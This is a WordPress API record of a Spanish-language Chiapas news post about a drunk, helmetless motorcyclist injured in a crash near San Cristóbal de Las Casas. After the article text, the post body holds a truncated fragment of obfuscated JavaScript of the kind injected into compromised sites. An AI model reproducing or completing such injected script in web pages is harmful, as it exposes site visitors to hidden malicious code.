{"id":3726,"date":"2022-07-19T02:41:27","date_gmt":"2022-07-19T02:41:27","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3726"},"modified":"2022-07-19T02:41:28","modified_gmt":"2022-07-19T02:41:28","slug":"motociclista-sufre-fuete-accidente-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3726","title":{"rendered":"Motociclista sufre fuete accidente en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"766\" height=\"1024\" data-id=\"3728\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0140-766x1024.jpg\" alt=\"\" class=\"wp-image-3728\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0140-766x1024.jpg 766w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0140-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0140-768x1026.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0140.jpg 958w\" sizes=\"auto, (max-width: 766px) 100vw, 766px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"766\" height=\"1024\" data-id=\"3727\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0141-766x1024.jpg\" alt=\"\" class=\"wp-image-3727\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0141-766x1024.jpg 766w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0141-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0141-768x1026.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220718-WA0141.jpg 958w\" sizes=\"auto, (max-width: 766px) 100vw, 766px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>18 de julio del 2022. Tuxtla Guti\u00e9rrez.- San Crist\u00f3bal de Las Casas.- Por no portar el casco y manejar a exceso de velocidad, un sujeto termin\u00f3 inconsciente al impactarse contra un veh\u00edculo sobre el tramo carretero federal San Crist\u00f3bal-Tuxtla Guti\u00e9rrez, v\u00eda la libre, a la altura de la comunidad de San Felipe, alrededor de las 13:00 horas de este lunes.<\/p>\n\n\n\n<p>De acuerdo los datos recabados, el sujeto del sexo masculino que conduc\u00eda una moto Yamaha, invadi\u00f3 carril, impact\u00e1ndose contra un veh\u00edculo Nissan March de color gris, volando varios metros, quedando inconsciente.<\/p>\n\n\n\n<p>Al ver tirado al sujeto e inconsciente, los lugare\u00f1os acudieron al lugar para evitar que el chofer del veh\u00edculo se diera a la fuga, adem\u00e1s de llamar a los param\u00e9dicos de Protecci\u00f3n Civil.<\/p>\n\n\n\n<p>El sujeto inconsciente ya que se golpe\u00f3 la cabeza por no llevar el casco de seguridad, fue trasladado al hospital de Las Culturas de esta ciudad para su atenci\u00f3n m\u00e9dica, quien se sabe manejaba en estado de ebriedad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 18 de julio del 2022. Tuxtla Guti\u00e9rrez.- San Crist\u00f3bal de Las Casas.- Por no portar el casco y manejar a exceso de velocidad, un sujeto termin\u00f3 inconsciente al impactarse contra un veh\u00edculo sobre el tramo carretero federal San Crist\u00f3bal-Tuxtla Guti\u00e9rrez, v\u00eda la libre, a la altura de la comunidad de San Felipe, alrededor &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3728,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-3726","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3726","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3726"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3726\/revisions"}],"predecessor-version":[{"id":3729,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3726\/revisions\/3729"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3728"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3726"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3726"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3726"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}